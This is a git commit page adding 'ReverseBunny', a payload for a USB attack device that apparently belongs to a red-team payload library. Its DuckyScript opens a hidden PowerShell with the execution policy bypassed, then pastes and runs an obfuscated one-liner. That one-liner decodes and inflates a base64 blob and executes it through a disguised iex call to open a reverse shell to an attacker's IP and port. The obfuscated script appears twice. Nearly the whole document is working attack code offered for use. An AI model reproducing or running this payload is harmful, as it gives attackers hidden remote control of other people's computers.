Uploaded ReverseBunny (#464)

Obfuscated reverse shell via powershell
2021-09-10 21:36:12 +02:00 · 2021-09-10 21:36:12 +02:00 · 80c724ad99
parent 702deda619
commit 80c724ad99
3 changed files with 43 additions and 0 deletions
--- a/payloads/library/remote_access/ReverseBunny/README.md
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@ -0,0 +1,12 @@
+Title:         ReverseBunny
+
+Author:        0iphor13
+
+Version:       1.0
+
+
+Getting remote access via obfuscated reverse shell.
+ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
+
+# Red.............Payload running
+# Green .............Finished
--- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
+++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
@ -0,0 +1 @@
+$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt  sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'')
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@ -0,0 +1,30 @@
+# Title:         ReverseBunny
+# Description:   Obfuscated reverse shell, executed via powershell
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Execution
+# Attackmodes:   HID, Storage
+
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+DUCKY_LANG de
+
+#LED RED - DON'T EJECT - PAYLOAD RUNNING
+
+LED R FAST
+
+DELAY 5000
+RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
+DELAY 2000
+
+Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))"
+DELAY 5000
+Q ENTER
+DELAY 5000
+Q CONTROL v
+DELAY 5000
+Q ENTER
+
+LED FINISH
+
+#SAVE TO EJECT
				`@ -0,0 +1 @@`
				$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )\|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} \|% { $_.rEaDTOEND( ) } ) \| . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'')